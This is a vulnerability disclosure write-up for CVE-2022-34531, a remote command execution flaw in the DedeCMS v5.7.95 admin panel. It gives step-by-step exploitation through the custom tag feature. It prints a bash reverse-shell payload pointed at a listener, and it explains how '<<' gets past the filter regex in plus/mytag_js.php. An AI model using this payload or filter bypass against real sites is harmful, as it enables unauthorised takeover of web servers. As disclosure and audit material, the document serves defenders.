CVE-2022-34531: vuls/DedeCMS-v5.7.95-RCE.md at main · Airrudder/vuls

DedeCMS v5.7.95 RCE

Dedecms official website：https://www.dedecms.com/download。

Vulnerability description

There is an arbitrary command execution vulnerability in the background of dedecms v5.7.95, which can write malicious code and cause rce vulnerability.

Vulnerability impact

DedeCMS v5.7.95

Recurrence process

First visit /dede to log in to the background.

Visit dede/mytag_ main.php, inserts a tag.

The main contents are as follows:

The backquote(`) is actually the alias of the shell_exec function:

Click “OK” to get the corresponding number, which is marked as 3 this time. Visit /plus/mytag_js.php?arcID=3&nocache=1, where arcID=3 is the tag number. After that, the file a will be generated and directly included.

Further use to reverse shell:

<<?=`bash -i &>/dev/tcp/127.0.0.1/2333 <&1`;?>

use ncat:

Visit /plus/mytag_js.php?arcID=3&nocache=1 to reverse the shell successfully:

Code audit

Vulnerability location is in plus/mytag_js.php, you can see that the file contains directly after the file is written. In this case, we don’t have to care about the file name. Here, the file name has a fixed htm suffix. We need to care about what the myvalues content is when the file is written.

The value of myvalues is found through query. The query statements are:

SELECT * FROM `#@__mytag` WHERE aid=’$aid’

You can search globally to get the information in mytag_add.php or mytag_edit.php. These two files involve the insertion or update of tables.

So visit mytag_main.php, here are add and edit operations

a lot of malicious functions are filtered in plus/mytag_js.php, but the backquotes(`) are not filtered, and they cannot match [^<]+<?(php|=)：

// will be matched abcde<?php `ls`;?> <?=`ls`;?>

// will not be matched <<?=`ls`?>

Use << to bypass [^<]+<?(php|=), thus rce succeeds.

See the “Recurrence process” above for specific operation and utilization.